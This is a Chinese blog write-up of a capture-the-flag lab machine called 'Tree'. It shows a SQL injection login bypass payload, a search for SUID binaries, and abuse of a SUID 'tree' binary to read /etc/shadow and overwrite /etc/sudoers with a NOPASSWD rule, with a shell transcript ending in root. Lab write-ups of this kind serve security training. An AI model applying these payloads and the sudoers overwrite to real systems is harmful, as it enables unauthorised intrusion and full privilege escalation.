20250713_Tree_neuro 靶机复盘

最新推荐文章于 2025-12-30 14:18:03 发布
原创 最新推荐文章于 2025-12-30 14:18:03 发布 · 238 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #web安全

外部打点(sql注入)

target:192.168.1.10

web 界面查询用户,sql 万能语句注入进去
http://192.168.1.10/?username=1%27%20or%20%271%27=%271
1' or '1'='1

拿到

**用户名:** yolo  
**邮箱:** yolo's password:06f5086772e0

ssh 登录成功

提权 (TREE_SUID特权读取和写入)

上传 linpeas或者 find / -perm -4000 2>/dev/null 找到 SUID tree

结合 ai 阅读 help,其中 --fromfile 读文件,-o 写文件

可以读出 /root/root.txt 、 /etc/shadow 等等

爆破密码失败,利用写方法向 /etc/shadow 内加一条 yolo 特权用户

echo 'yolo ALL=(ALL) NOPASSWD: ALL' > a

由于直接 tree --fromfile a -o /etc/sudoer 会有格式问题

然后经过尝试,创建一个名为 ‘yolo ALL=(ALL) NOPASSWD: ALL’ 的文件,tree 利用参数去掉多余信息,

tree -i --noreport --fromfile yolo\ \ \ \ ALL\=\(ALL\)\ NOPASSWD\:\ ALL

这样就可以输出 yolo ALL=(ALL) NOPASSWD: ALL

然后再写入 /etc/sudoers 即可

完整过程如下

touch "yolo    ALL=(ALL) NOPASSWD: ALL"

tree -i --noreport --fromfile yolo\ \ \ \ ALL\=\(ALL\)\ NOPASSWD\:\ ALL -o /etc/sudoers

sudo -i

tree 一读一写反复横跳

yolo@Tree:/tmp$ tree -i --noreport --fromfile a
a
111
yolo@Tree:/tmp$ touch "yolo    ALL=(ALL) NOPASSWD: ALL"
yolo@Tree:/tmp$ ls
 a            systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-apache2.service-z9Ityg
 exploit.c    systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-systemd-logind.service-Q9jtFi
 exploit.so   systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-systemd-timesyncd.service-pE5lvj
 linpeas     'yolo    ALL=(ALL) NOPASSWD: ALL'
yolo@Tree:/tmp$ tree -i --noreport --fromfile yolo\ \ \ \ ALL\=\(ALL\)\ NOPASSWD\:\ ALL 
yolo    ALL=(ALL) NOPASSWD: ALL
yolo@Tree:/tmp$ tree -i --noreport --fromfile yolo\ \ \ \ ALL\=\(ALL\)\ NOPASSWD\:\ ALL -o c
yolo@Tree:/tmp$ ls
 a            systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-apache2.service-z9Ityg
 c            systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-systemd-logind.service-Q9jtFi
 exploit.c    systemd-private-9dc6948caaf84af88b7a2b6ed61f06cc-systemd-timesyncd.service-pE5lvj
 exploit.so  'yolo    ALL=(ALL) NOPASSWD: ALL'
 linpeas
yolo@Tree:/tmp$ cat c
yolo    ALL=(ALL) NOPASSWD: ALL
yolo@Tree:/tmp$ tree -i --noreport --fromfile yolo\ \ \ \ ALL\=\(ALL\)\ NOPASSWD\:\ ALL -o /etc/sudoers
yolo@Tree:/tmp$ sudo -i
root@Tree:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Tree:~# ls
note.txt  root.txt
root@Tree:~# cat root.txt 
.
├── a
├── b
└── user.txt

0 directories, 3 files
root@Tree:~#

总结

sql 万能密码注入获取到用户凭证
查找 suid 程序 tree,利用 --fromfile 读取敏感信息
利用 -o 和文件名写入文件,-i --noreport 清理写入数据
写入 /etc/sudoers 提权成功

20250715_Sneak_neuro 靶机复盘
Bulestardemon的博客
07-15 400
本文记录了从外部打点到权限提升的完整渗透过程。首先通过nmap扫描发现开放端口,使用dirsearch发现cms目录,通过文档识别出flatCore CMS框架并找到相关漏洞。成功爆破后台账号后,利用文件上传漏洞获取webshell。在提权阶段,通过分析/etc/passwd提示找到被修改的私钥文件,编写Python脚本修复蛇形加密的私钥格式,获得SSH访问权限。最后利用sudo more命令特性,通过分页模式执行命令成功提权至root。整个渗透过程涵盖了信息收集、漏洞利用、密码爆破、文件上传、私钥修复和特
2020_ICML_Neuro-Symbolic Visual Reasoning: Disentangling “Visual” from “Reasoning”
晨旭OvO的博客
04-21 828
Neuro-Symbolic Visual Reasoning: Disentangling “Visual” from “Reasoning” 对 paper 的粗度 & 自己的感想
移植使用nr_micro_shell
HES_C的博客
04-07 1088
在使用linux和win系统的时候大家看到命令行也是很熟悉的了,大家的第一个hello程序应该都是控制台程序,在系统层面我们可以使用命令行操作我们的pc,那么在单片机里面通过串口怎么用命令操作单片机呢?显然第一想法是我们去自己写一个shell,我以前也写过,这样效率很低,还可能有bug,突然一天发现一个开源的纯c的shell。nr_micro_shell: shell for MCU. 单片机命令行交互。首先把代码弄下来;代码的结构作者已经写的很清楚了,我们只需要关注examples,inc,src。
时间序列分析_1215
jerrykorea的博客
12-16 610
Event A → Event B (是否因果)
Neuro-Nav 使用教程
gitblog_00064的博客
04-16 283
Neuro-Nav 使用教程 1. 项目介绍 Neuro-Nav 是一个开源库,用于神经可塑性强化学习(Reinforcement Learning, RL)的研究。它提供了一系列标准化环境与RL算法,这些算法源自于啮齿动物和人类的经典行为与神经学研究。Neuro-Nav 还包含了一系列 Jupyter 笔记本,用于重现文献中的各种实验结果。 2. 项目快速启动 首先,您需要安装 Neuro-Na...
AForge.Neuro
xie__jin__cheng的博客
08-07 210
AForge.Neuro
SNV_indel相关文献
fanyucai1
01-15 1383
hg19 ftp://gsapubftp-anonymous@ftp.broadinstitute.org/bundle/hg19/ucsc.hg19.fasta.gz convert GRch37 to hg19 ftp://gsapubftp-anonymous@ftp.broadinstitute.org/Liftover_Chain_Files/b37tohg19.chain gatk ...
my-neuro rag 向量数据库部分 笔记 sklearn.metrics.pairwise.cosine_similarity watchdog 召回
misuseds的博客
09-19 758
这是一个运行在本地的语义搜索引擎 + 知识库问答 API 服务,能根据用户提问从“记忆库.txt”中找出最相关的段落,并通过横线分隔管理知识片段。这是一套轻量级本地知识库语义检索引擎,专为中文设计,支持热更新、日志记录、GPU加速,适用于构建带有“记忆能力”的对话机器人、个人AI助理、游戏NPC记忆系统等。你可以把它理解为:🔹 “我的AI大脑的记忆模块”🔹 “让AI记得你说过啥的小助手”步骤干了啥类比1️⃣ encode把“问题”变成数字向量把一句话翻译成“数学语言”
Efficient Rectification of Neuro-Symbolic Reasoning Inconsistencies byAbductive高效修正神经符号推理不一致性的溯因反思方法
Together_CZ的博客
03-17 1593
Efficient Rectification of Neuro-Symbolic Reasoning Inconsistencies by Abductive Reflection 高效修正神经符号推理不一致性的溯因反思方法
ANFIS_2_class.rar_ANFIS_adaptive neuro fuzzy_neuro fuzzy_neuro-a
09-24
ANFIS,全称为Adaptive Neuro-Fuzzy Inference System(自适应神经模糊推理系统),是融合了模糊逻辑和人工神经网络技术的一种智能计算模型。它由Jang在1993年提出,旨在结合模糊系统的灵活性和神经网络的学习能力,...
isi.rar_L.E.L_neuro fuzzy_neuro-fuzzy
09-19
标题中的“isi.rar_L.E.L_neuro fuzzy_neuro-fuzzy”暗示了这是一个关于人工智能领域,特别是神经模糊系统(Neuro-Fuzzy Systems)的学习资源或文献集合。"L.E.L"可能指的是作者或编者的姓名缩写,而".rar"表明这是...
Anfis.rar_ANFIS_fuzzy adaptive_neuro fuzzy
09-20
ANFIS,全称为Adaptive Neuro-Fuzzy Inference System(自适应神经模糊推理系统),是一种融合了模糊逻辑和人工神经网络理论的智能计算模型。该系统由Jang于1993年提出,旨在结合模糊系统的灵活性和神经网络的学习...
ANFIS algorithm.zip_ANFIS_adaptive anfis_neuro fuzzy_模糊推理_神经模糊推理
07-14
标题中的"ANFIS algorithm.zip_ANFIS_adaptive anfis_neuro fuzzy_模糊推理_神经模糊推理"指的是一个关于ANFIS(Adaptive Neuro-Fuzzy Inference System,自适应神经模糊推理系统)算法的压缩文件,其中包含了ANFIS...
Linux:五种IO模型
2301_80894970的博客
12-27 966
本文介绍了五种I/O模型的理论概念,重点分析了非阻塞I/O和多路转接I/O模式。文章通过钓鱼的生动比喻,阐述了阻塞I/O、非阻塞I/O、信号驱动I/O、多路检测I/O和异步I/O的区别。详细讲解了select、poll和epoll三种多路转接技术的实现原理和代码示例,比较了它们的优缺点。特别深入分析了epoll的水平触发(LT)和边缘触发(ET)两种工作模式,指出ET模式必须配合非阻塞I/O使用才能发挥最佳性能。通过理论讲解和代码实现相结合的方式,全面展示了Linux系统下高效I/O处理的实现方法和技术演进
Linux上查看systemd journald日志
yinminsumeng的博客
12-26 407
Linux系统日志查看方法摘要 本文总结了systemd journal日志的多种查看方式: 基础查看:使用journalctl命令可查看全部日志,-f实时跟踪,-b显示启动日志,-o指定输出格式(如json/verbose等)。 筛选过滤: 时间筛选:--since/--until指定时间范围 服务筛选:-u按服务单元过滤 优先级筛选:-p按日志级别(0-7) 字段筛选:_PID、_UID等按进程/用户过滤 关键字搜索:-g支持正则表达式 指定文件:可通过--file查看特定日志文件,包括持久化日志、运行
基于 Linux 内核模块的字符设备互斥访问实验
weixin_57340941的博客
12-30 356
这个信号量实验是。
Linux(redhat7.9)安装KVM虚拟机
两拆
12-27 406
在Redhat7.9系统中通过KVM安装虚拟机
Linux CFS 调度器深度解析
最新发布
X
12-30 468
数学模型驱动: 用 vruntime 精确量化公平性简单性: 核心算法简洁优雅, 易于理解和维护自适应性: 自动适应不同负载和工作模式可扩展性: 通过组调度支持复杂场景表5: CFS 调度器的核心优势总结维度传统调度器CFS改进效果公平性基于优先级的时间片按权重的比例公平更精确的公平分配交互性需要启发式识别自然获得良好响应交互进程响应更快吞吐量固定时间片可能浪费动态调整, 减少切换整体吞吐量提升可配置性多个复杂参数主要调整 nice 值用户接口更简单代码维护复杂启发式逻辑。
Linux 防火墙配置详解:iptables 与 firewalld 的实战指南
A5互联
12-30 866
在企业级 Linux 运维场景中,防火墙不仅是简单的“开关”,而是关系到网络安全性、业务可用性与性能边界的重要组件。本文以真实项目经验为基础,结合具体硬件配置、产品参数、代码示例和性能评估,全面讲解 `iptables` 与 `firewalld` 的架构差异、实战配置与优化方法,帮助你从一线配置走向深入的性能调优与安全设计。
创建神经影像分析Ubuntu Docker:Neuro_Docker的介绍
**neuro_docker-master**文件名暗示了这是一个存储库的主分支,包含了用于创建神经影像学Docker镜像所需的所有代码、脚本和配置文件。 ### 维护和更新 文档提到,自从其创建者不再维护此Dockerfile以来,建议使用...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值